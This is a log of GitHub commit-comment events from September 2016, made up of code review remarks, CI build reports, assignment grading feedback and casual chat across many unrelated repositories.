{"id":"4530708520","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937139,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:36:22Z","updated_at":"2016-09-07T22:36:22Z","body":"and the mouse thing is different on each computer\r\n"}},"created_at":"2016-09-07T22:36:22Z"}
{"id":"4530708761","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18937140,"position":null,"line":null,"path":null,"commit_id":"0a4f9585a65b7e52201853e616a7bb8e9f47a09c","created_at":"2016-09-07T22:36:25Z","updated_at":"2016-09-07T22:36:25Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 22](http://teamcity.otenv.com/viewLog.html?buildId=5181198&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-07T22:36:25Z"}
{"id":"4530709563","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937145,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:36:37Z","updated_at":"2016-09-07T22:36:37Z","body":"I know, that's why you use sendkeys!"}},"created_at":"2016-09-07T22:36:37Z"}
{"id":"4530710891","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937150,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:36:58Z","updated_at":"2016-09-07T22:36:58Z","body":"Remember the spam thing I made to spam Connor? That was fun."}},"created_at":"2016-09-07T22:36:58Z"}
{"id":"4530711825","type":"CommitCommentEvent","actor":{"login":"leotrubach"},"repo":{"name":"Stefano80/COBO"},"payload":{"comment":{"id":18937154,"position":72,"line":72,"path":"COBO.py","commit_id":"05e301112a2f7e24691528b5542df91e897fd100","created_at":"2016-09-07T22:37:13Z","updated_at":"2016-09-07T22:37:13Z","body":"This does not make copy of Pars. Maybe you need to write Pars[:] if you want to preserve Pars"}},"created_at":"2016-09-07T22:37:13Z"}
{"id":"4530713310","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18937162,"position":null,"line":null,"path":null,"commit_id":"0a4f9585a65b7e52201853e616a7bb8e9f47a09c","created_at":"2016-09-07T22:37:35Z","updated_at":"2016-09-07T22:37:35Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 22](http://teamcity.otenv.com/viewLog.html?buildId=5181198&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 19 Build time: 00:01:10"}},"created_at":"2016-09-07T22:37:35Z"}
{"id":"4530713375","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937163,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:37:36Z","updated_at":"2016-09-07T22:37:36Z","body":"I was using powershell to move the mouse to a certain coordinate. Google it, its actually really easy. The hard part is getting it on the button..."}},"created_at":"2016-09-07T22:37:36Z"}
{"id":"4530713523","type":"CommitCommentEvent","actor":{"login":"bvaughn"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18937165,"position":null,"line":null,"path":null,"commit_id":"7fe723f1195d4dd5012ffb7f5c6b4b383daf5172","created_at":"2016-09-07T22:37:39Z","updated_at":"2016-09-07T22:37:39Z","body":"Not yet! Hope to add support for that combo soon. Traveling in China this week and my time is kind of limited. :)"}},"created_at":"2016-09-07T22:37:39Z"}
{"id":"4530713860","type":"CommitCommentEvent","actor":{"login":"RobDolinMS"},"repo":{"name":"opencontainers/tob"},"payload":{"comment":{"id":18937167,"position":null,"line":null,"path":null,"commit_id":"021936746772c1d2145ce57c3361f51fa3c00072","created_at":"2016-09-07T22:37:44Z","updated_at":"2016-09-07T22:37:44Z","body":"Signed-off-by: Rob Dolin <robdolin@microsoft.com>"}},"created_at":"2016-09-07T22:37:44Z"}
{"id":"4530714258","type":"CommitCommentEvent","actor":{"login":"bvaughn"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18937170,"position":null,"line":null,"path":null,"commit_id":"7fe723f1195d4dd5012ffb7f5c6b4b383daf5172","created_at":"2016-09-07T22:37:50Z","updated_at":"2016-09-07T22:37:50Z","body":"PS Thanks :grin:"}},"created_at":"2016-09-07T22:37:50Z"}
{"id":"4530715342","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937176,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:38:07Z","updated_at":"2016-09-07T22:38:07Z","body":"Can you email me a zip of the code?"}},"created_at":"2016-09-07T22:38:07Z"}
{"id":"4530725945","type":"CommitCommentEvent","actor":{"login":"majacaci00"},"repo":{"name":"vnessified/DSI-SF-2-vnessified"},"payload":{"comment":{"id":18937205,"position":null,"line":null,"path":null,"commit_id":"cc2844d3034fe8aae41424b38df720d2511f26f4","created_at":"2016-09-07T22:40:52Z","updated_at":"2016-09-07T22:40:52Z","body":"Q1. The exploring/cleaning of data sets is more or less correct. \r\nYour analysis (modeling) could benefit by using logistic regression, and then comparing the results with the ones you found in your Knn. Need to validate your models using accuracy (see solutions for more ideas)\r\n\r\nQ2. Overall is ok. You were supposed to come up with two different analysis and data frames (reviews and tips) and compared them. Your ROC curve is not much different than guessing (middle line). Revise solutions\r\n\r\nQ3. See solutions\t\r\n\r\nQ4. See solutions\t\r\n\r\nQ5. See solutions\t\t\r\n\r\nSummary\r\nThis project was a little challenging, but you were able to implement a comprehensive EDA. Concerning your models or modeling make sure you understand how to implement logisitic/knn models and evaluate them. See/revise the solutions for more ideas."}},"created_at":"2016-09-07T22:40:52Z"}
{"id":"4530726115","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18937207,"position":165,"line":165,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-07T22:40:55Z","updated_at":"2016-09-07T22:40:55Z","body":"I think this makes *much* more sense than the way that Trac uses colour by default (for priority).\r\n\r\nI think a potential change here would be to leave out the priority field and use an image instead (since there are only really 4 possible values). It seems like a simple / clean way of doing that would be to adjust the footer for the attachment. e.g. have an emoji that means \"low\", \"normal\", \"high\", and \"highest\", and put that at the start of the footer (a custom emoji or there are probably a set of four that would make sense). Or it could be a thumb_url instead, but that means loading an image from somewhere."}},"created_at":"2016-09-07T22:40:55Z"}
{"id":"4530730381","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937217,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:42:02Z","updated_at":"2016-09-07T22:42:02Z","body":"Ah I get it, sorry. Should have been obvious from the data. Granularity per interval"}},"created_at":"2016-09-07T22:42:02Z"}
{"id":"4530733542","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937223,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:42:42Z","updated_at":"2016-09-07T22:42:42Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T22:42:42Z"}
{"id":"4530735581","type":"CommitCommentEvent","actor":{"login":"guilmour"},"repo":{"name":"guilmour/greew"},"payload":{"comment":{"id":18937227,"position":null,"line":null,"path":null,"commit_id":"7e0bc1f9309274333c80e7dd6ef199664577dfd0","created_at":"2016-09-07T22:43:17Z","updated_at":"2016-09-07T22:43:17Z","body":"Agora sim! @samueloph "}},"created_at":"2016-09-07T22:43:17Z"}
{"id":"4530735742","type":"CommitCommentEvent","actor":{"login":"Marco01809"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18937228,"position":69,"line":161,"path":"scripts/jobs/cron_letsencrypt.php","commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-07T22:43:19Z","updated_at":"2016-09-07T22:43:19Z","body":"Empty result set.\r\n\r\nThere is one record with `domainid=0`, but its expirationdate is 3 months in the future."}},"created_at":"2016-09-07T22:43:19Z"}
{"id":"4530739502","type":"CommitCommentEvent","actor":{"login":"majacaci00"},"repo":{"name":"DanielEMoreno/DSI-SF-2-DanielEMoreno"},"payload":{"comment":{"id":18937236,"position":null,"line":null,"path":null,"commit_id":"7b2940f6cdff4943af0dce9ae82d53f9db780d26","created_at":"2016-09-07T22:44:17Z","updated_at":"2016-09-07T22:44:17Z","body":"Q1. Good job, make sure you always print the baseline of your Y, it will help you see if the results of your model are better than just guessing. Also, you forgot to write up a \"profile\" for Las Vegas.\t\r\n\r\nQ2. Great way of creating clean service dataset(s). Why did you use a linear regression, when your y variable is not a continues variable. You should have used a classification method. Revise solutions.\t\r\n\r\nQ3. Good job, See/revise solutions. \t\r\n\r\nQ4. See solutions\t\r\n\r\nQ5. See solutions\t\r\n\r\nSummary\r\nGreat job Daniel, make sure you know/understand when to use a logistic regression vs. a linear regression (revise class notes/slides. Also, make sure you add comments on your code to explain what is going on, sometimes is hard to follow up what is going on with your code. "}},"created_at":"2016-09-07T22:44:17Z"}
{"id":"4530740846","type":"CommitCommentEvent","actor":{"login":"AdamTyler"},"repo":{"name":"kmoskwiak/videojs-resolution-switcher"},"payload":{"comment":{"id":18937242,"position":null,"line":null,"path":null,"commit_id":"9ac272f9056e933374981fc642f36c706ed21a78","created_at":"2016-09-07T22:44:36Z","updated_at":"2016-09-07T22:44:36Z","body":"Why is it not supported?"}},"created_at":"2016-09-07T22:44:36Z"}
{"id":"4530744632","type":"CommitCommentEvent","actor":{"login":"tsalo"},"repo":{"name":"tsalo/featureX"},"payload":{"comment":{"id":18937250,"position":null,"line":null,"path":null,"commit_id":"5aacb7148a7dbf4d68a3d7a28e6e04b4ebcfbda5","created_at":"2016-09-07T22:45:34Z","updated_at":"2016-09-07T22:45:34Z","body":"Also had to fix possible errors in featurex/stimuli/audio.py and featurex/core.py to get everything working. All tests pass."}},"created_at":"2016-09-07T22:45:34Z"}
{"id":"4530747622","type":"CommitCommentEvent","actor":{"login":"Razzile"},"repo":{"name":"Maxie01/we-made-a-theme"},"payload":{"comment":{"id":18937262,"position":null,"line":null,"path":null,"commit_id":"23d8c762bd35af459593d243855f9cd7494405dc","created_at":"2016-09-07T22:46:19Z","updated_at":"2016-09-07T22:46:19Z","body":"The code used in this theme is licenced under the GPL v3 please relicense your project under the same license or face major consequences "}},"created_at":"2016-09-07T22:46:19Z"}
{"id":"4530749216","type":"CommitCommentEvent","actor":{"login":"dhilipsiva"},"repo":{"name":"iogf/snip.bash"},"payload":{"comment":{"id":18937266,"position":5,"line":493,"path":"templates_bash/tests.sh","commit_id":"43dc356ab4d0e0254d61b5596531414e971cd6bf","created_at":"2016-09-07T22:46:45Z","updated_at":"2016-09-07T22:46:45Z","body":"Scarp mails from my repo? 😕 😛 "}},"created_at":"2016-09-07T22:46:45Z"}
{"id":"4530752695","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937273,"position":104,"line":282,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:47:42Z","updated_at":"2016-09-07T22:47:42Z","body":"Can confirm, also working now.."}},"created_at":"2016-09-07T22:47:42Z"}
{"id":"4530752968","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18937274,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T22:47:47Z","updated_at":"2016-09-07T22:47:47Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T22:47:47Z"}
{"id":"4530754024","type":"CommitCommentEvent","actor":{"login":"naucoin"},"repo":{"name":"naucoin/SlicerOpenCV"},"payload":{"comment":{"id":18937278,"position":32,"line":32,"path":"SlicerOpenCV/Testing/Python/SlicerOpenCVSelfTest.py","commit_id":"164d643ef10cbf0d6b1c1b385123495d867dffa4","created_at":"2016-09-07T22:48:05Z","updated_at":"2016-09-07T22:48:05Z","body":"@jcfr I'm having some issues with importing the cv2 python wrapped library.  Specifying the full path to the build dir works in the extension build directory, but when it loads as a self test, only doing the load_dynamic with the bare file name works. This version works on mac, I have to test on windows, but if you have any insight, I'd appreciate it.\r\nThe cv2.so does get installed properly into the extension's third party install lib dir:\r\nSlicer-build/bin/Slicer.app/Contents/Extensions-25331/SlicerOpenCV/lib/Slicer-4.5/cv2.so\r\nbut I'm not seeing that dir when I look at the python path in Slicer, so I'm really uncertain how it's getting imported."}},"created_at":"2016-09-07T22:48:05Z"}
{"id":"4530757010","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937281,"position":null,"line":null,"path":null,"commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:48:51Z","updated_at":"2016-09-07T22:48:51Z","body":"When I'm done implementing the interface, I'll add an integration test that regularly checks the API. I think that would be great to ensure consistency. Could you do something like that?"}},"created_at":"2016-09-07T22:48:51Z"}
{"id":"4530759849","type":"CommitCommentEvent","actor":{"login":"vks"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18937293,"position":44,"line":933,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T22:49:38Z","updated_at":"2016-09-07T22:49:38Z","body":"Well, I don't really see how that is better than using `git log`/`git blame`, but if it works for you, why not."}},"created_at":"2016-09-07T22:49:38Z"}
{"id":"4530760337","type":"CommitCommentEvent","actor":{"login":"ulion"},"repo":{"name":"dropbox/dropbox-sdk-js"},"payload":{"comment":{"id":18937296,"position":11,"line":10,"path":"src/rpc-request.js","commit_id":"e1e440737964736511b1126840d6bf41b5dc50fc","created_at":"2016-09-07T22:49:45Z","updated_at":"2016-09-07T22:49:45Z","body":"When the response is undefined, e.g. when network TLS error, this will crash whole node instance. and which should not crash the instance since we are using promise and waiting the result."}},"created_at":"2016-09-07T22:49:45Z"}
{"id":"4530762098","type":"CommitCommentEvent","actor":{"login":"gitoso"},"repo":{"name":"guilmour/greew"},"payload":{"comment":{"id":18937302,"position":null,"line":null,"path":null,"commit_id":"7e0bc1f9309274333c80e7dd6ef199664577dfd0","created_at":"2016-09-07T22:50:09Z","updated_at":"2016-09-07T22:50:09Z","body":"Eu abri um pedido no suporte do GitHub pra liberar esse username e deu boa xDD"}},"created_at":"2016-09-07T22:50:09Z"}
{"id":"4530763313","type":"CommitCommentEvent","actor":{"login":"stinoga"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18937304,"position":null,"line":null,"path":null,"commit_id":"7fe723f1195d4dd5012ffb7f5c6b4b383daf5172","created_at":"2016-09-07T22:50:26Z","updated_at":"2016-09-07T22:50:26Z","body":"@bvaughn Awesome work dude. And no hurry on it, enjoy your trip!"}},"created_at":"2016-09-07T22:50:26Z"}
{"id":"4530765280","type":"CommitCommentEvent","actor":{"login":"thiagodds"},"repo":{"name":"thiagodds/pro-react"},"payload":{"comment":{"id":18937311,"position":5,"line":5,"path":"src/kanban-board/app/CheckList.js","commit_id":"2c20b6f4b8894530387084996f651ead94068ce4","created_at":"2016-09-07T22:50:57Z","updated_at":"2016-09-07T22:50:57Z","body":"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/map"}},"created_at":"2016-09-07T22:50:57Z"}
{"id":"4530767152","type":"CommitCommentEvent","actor":{"login":"thiagodds"},"repo":{"name":"thiagodds/pro-react"},"payload":{"comment":{"id":18937314,"position":9,"line":9,"path":"src/kanban-board/app/KanbanBoard.Js","commit_id":"2c20b6f4b8894530387084996f651ead94068ce4","created_at":"2016-09-07T22:51:27Z","updated_at":"2016-09-07T22:51:27Z","body":"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter"}},"created_at":"2016-09-07T22:51:27Z"}
{"id":"4530769320","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937317,"position":null,"line":null,"path":null,"commit_id":"5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f","created_at":"2016-09-07T22:52:03Z","updated_at":"2016-09-07T22:52:03Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T22:52:03Z"}
{"id":"4530771956","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18937319,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T22:52:44Z","updated_at":"2016-09-07T22:52:44Z","body":"Wow, is this a record for fewest games to pass LTC?  Congrats!"}},"created_at":"2016-09-07T22:52:44Z"}
{"id":"4530780622","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18937340,"position":null,"line":null,"path":null,"commit_id":"5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f","created_at":"2016-09-07T22:54:53Z","updated_at":"2016-09-07T22:54:53Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T22:54:53Z"}
{"id":"4530782750","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18937349,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T22:55:25Z","updated_at":"2016-09-07T22:55:25Z","body":"I'll just fix the tileDirt"}},"created_at":"2016-09-07T22:55:25Z"}
{"id":"4530788413","type":"CommitCommentEvent","actor":{"login":"sagnew"},"repo":{"name":"sagnew/floppy-bird-demo"},"payload":{"comment":{"id":18937361,"position":42,"line":111,"path":"public/js/main.js","commit_id":"a65de670a3dc8b919b62a508cf672f4dc177cba2","created_at":"2016-09-07T22:56:50Z","updated_at":"2016-09-07T22:56:50Z","body":"Disregard this line. Pretty sure I added this in the master branch."}},"created_at":"2016-09-07T22:56:50Z"}
{"id":"4530789659","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18937366,"position":7,"line":83,"path":"gamelogiclib/libQSgsGameLogic.pro","commit_id":"0a133651ec8743aa1c04372418e8e515e6471732","created_at":"2016-09-07T22:57:11Z","updated_at":"2016-09-07T22:57:11Z","body":"这里是个问题，应该判断QMAKE_HOST.os是否是win"}},"created_at":"2016-09-07T22:57:11Z"}
{"id":"4530795132","type":"CommitCommentEvent","actor":{"login":"G3N7"},"repo":{"name":"Mongo2Go/Mongo2Go"},"payload":{"comment":{"id":18937376,"position":null,"line":null,"path":null,"commit_id":"816229292dd29d726e4d4e7517e3e851eaef6b7c","created_at":"2016-09-07T22:58:37Z","updated_at":"2016-09-07T22:58:37Z","body":"FYI, this new version is running well locally on _Windows 10_, in _travis-ci_ and in _TeamCity_ on a _Windows Server 2012 R2_"}},"created_at":"2016-09-07T22:58:37Z"}
{"id":"4530796172","type":"CommitCommentEvent","actor":{"login":"yunxing"},"repo":{"name":"facebook/reason"},"payload":{"comment":{"id":18937379,"position":null,"line":null,"path":null,"commit_id":"c2d7df930ccfe8df4afcc925282ab439200c7443","created_at":"2016-09-07T22:58:54Z","updated_at":"2016-09-07T22:58:54Z","body":"utop-bin has a local dependency, reverting the last change until we fix it."}},"created_at":"2016-09-07T22:58:54Z"}
{"id":"4530797410","type":"CommitCommentEvent","actor":{"login":"Tuxity"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18937380,"position":33,"line":33,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-07T22:59:15Z","updated_at":"2016-09-07T22:59:15Z","body":"Doesn't work anymore `/raw_data_facebook`"}},"created_at":"2016-09-07T22:59:15Z"}
{"id":"4530797609","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18937381,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T22:59:18Z","updated_at":"2016-09-07T22:59:18Z","body":"@crunchyNYC: nope, http://tests.stockfishchess.org/tests/view/577e77870ebc5972faa166df :-)"}},"created_at":"2016-09-07T22:59:18Z"}
{"id":"4530800750","type":"CommitCommentEvent","actor":{"login":"josephgknox"},"repo":{"name":"SU-SWS/stanford_toggle_block"},"payload":{"comment":{"id":18937387,"position":null,"line":null,"path":null,"commit_id":"f4ed75d323d5f962c9be488d941231cf39158c48","created_at":"2016-09-07T23:00:09Z","updated_at":"2016-09-07T23:00:09Z","body":"Few things:\r\n\r\n1. Need to update the template file (?) so that content added to the \"Pre-link Text\" and \"Post-link Text\" fields are rendered\r\n2. Need to add a custom class (.active) to the li items so that the tabs can be styled\r\n3. Transition could use a little work"}},"created_at":"2016-09-07T23:00:09Z"}
{"id":"4530800926","type":"CommitCommentEvent","actor":{"login":"Tuxity"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18937389,"position":35,"line":35,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-07T23:00:12Z","updated_at":"2016-09-07T23:00:12Z","body":"`hash=703299870&key=3423&time=1472770011&neLat=%f&neLng=%f&swLat=%f&swLng=%f&pokemon=true&gyms=false&pokestops=false`"}},"created_at":"2016-09-07T23:00:12Z"}
{"id":"4530804112","type":"CommitCommentEvent","actor":{"login":"Tuxity"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18937393,"position":15,"line":15,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-07T23:00:56Z","updated_at":"2016-09-07T23:00:56Z","body":"`Go...../2.0.1 (iPhone; iOS 10.0; Scale/2.00)`"}},"created_at":"2016-09-07T23:00:56Z"}
{"id":"4530811356","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18937407,"position":2,"line":7,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T23:02:42Z","updated_at":"2016-09-07T23:02:42Z","body":"pase ya m_pRenderer y window al destructor de Game pero tengo un problema... como es un singleton descubri que no se borra nunca.... busque pero no me quedo claro como podria hacerlo sin entrar en un loop eterno... por ahi lo mejor es no usar un singleton aca aunque ahora que veo esto no usaria singleton para nada nunca jajjajajja"}},"created_at":"2016-09-07T23:02:42Z"}
{"id":"4530813489","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937416,"position":16,"line":257,"path":"sdcclient.py","commit_id":"e84362d188f08d324a8aa507b8c05bcc7aef0427","created_at":"2016-09-07T23:03:13Z","updated_at":"2016-09-07T23:03:13Z","body":"What Sysdig returns for `get_views_list` is a bit unfortunate; it's the only \"endpoint\" (well.. I know its just a JSON file) that gzips the returned data. I'd have to implement un-gzip just for this endpoint.. I'd say either compress *all* the responses or don't compress this (please)."}},"created_at":"2016-09-07T23:03:13Z"}
{"id":"4530818990","type":"CommitCommentEvent","actor":{"login":"rachel-fenichel"},"repo":{"name":"drigz/scratch-blocks"},"payload":{"comment":{"id":18937433,"position":14,"line":235,"path":"core/blockly.js","commit_id":"27c2e8c4ade15161e6ee2f78bcb1a7e1a611d1e0","created_at":"2016-09-07T23:04:37Z","updated_at":"2016-09-07T23:04:37Z","body":"What is this try-catch fixing?  I'm incorporating these changes into my PR."}},"created_at":"2016-09-07T23:04:37Z"}
{"id":"4530824547","type":"CommitCommentEvent","actor":{"login":"j-hagedorn"},"repo":{"name":"j-hagedorn/exploreSIS"},"payload":{"comment":{"id":18937446,"position":null,"line":null,"path":null,"commit_id":"daa07a519c68f26b5c56c3363f55c3bcd417904c","created_at":"2016-09-07T23:06:08Z","updated_at":"2016-09-07T23:06:08Z","body":"@jennadietsch, this is the most recent commit to the repo."}},"created_at":"2016-09-07T23:06:08Z"}
{"id":"4530825106","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18937448,"position":31,"line":308,"path":"psi4/share/psi4/python/molutil.py","commit_id":"04f9b104db7f7e8ad30eea0aa355e6bfbd3c644f","created_at":"2016-09-07T23:06:16Z","updated_at":"2016-09-07T23:06:16Z","body":"Currently this creates a global dictionary on the class (non-scoped). I added a py::dict to the Wavefunction class under the name cdict. The above needs to be modified to use the scoped `cdict` attribute rather than the above."}},"created_at":"2016-09-07T23:06:16Z"}
{"id":"4530826198","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18937454,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-07T23:06:35Z","updated_at":"2016-09-07T23:06:35Z","body":"Something went wrong when running [your job](https://github.com/JuliaLang/julia/commit/8db40db6092e37d04160d80a6cd281a888a30e69#commitcomment-18936836): `NanosoldierError: failed to run benchmarks against primary commit: ErrorException(\"failed process: Process(`sudo cset shield -e su nanosoldier -- -c ./benchscript.sh`, ProcessExited(139)) [139]\")`\nLogs and partial data can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/726a4486aebd564c571e0d78479207240a52a614/8db40db_vs_2ab4a0d/report.md)\ncc @jrevels"}},"created_at":"2016-09-07T23:06:35Z"}
{"id":"4530829214","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18937467,"position":2,"line":7,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T23:07:24Z","updated_at":"2016-09-07T23:07:24Z","body":"cierto! ese renderer se libera con la funcion SDL_RenderClear... solo chequeá en el destructor que si este no es nulo entonces llame al SDL_RenderClear"}},"created_at":"2016-09-07T23:07:24Z"}
